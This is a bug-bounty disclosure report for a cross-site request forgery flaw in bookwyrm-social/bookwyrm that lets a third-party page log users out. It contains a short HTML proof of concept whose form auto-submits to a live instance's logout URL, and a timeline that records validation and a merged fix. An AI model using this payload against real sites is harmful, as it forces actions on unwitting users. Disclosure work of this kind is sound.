Cross-Site Request Forgery (CSRF) in bookwyrm-social/bookwyrm

Valid

Reported on

Jul 6th 2022


Description

An attacker is able to log out a user if a logged-in user visits the attacker's website.

Proof of Concept

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://book.dansmonorage.blue/logout">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Impact

This vulnerability is capable of forging users to unintentional logout.

More details

One way GET request could be abused here is that a person (competitor perhaps:) placed an image tag with src="<your logout link>" anywhere on the internet, and if a user of your site stumbles upon that page, he will be unknowingly logged out. This is why it should be a POST request with a CSRF token.

Note

While this cannot harm a user's account, it can be a great annoyance and is a valid CSRF.

We are processing your report and will contact the bookwyrm-social/bookwyrm team within 24 hours. a month ago
We have contacted a member of the bookwyrm-social/bookwyrm team and are waiting to hear back a month ago
We have sent a follow up to the bookwyrm-social/bookwyrm team. We will try again in 7 days. 24 days ago
Mouse Reeve validated this vulnerability 24 days ago
KhanhCM has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Mouse Reeve confirmed that a fix has been merged on cf5959 24 days ago
The fix bounty has been dropped
login.py#L77-L83 has been validated
to join this conversation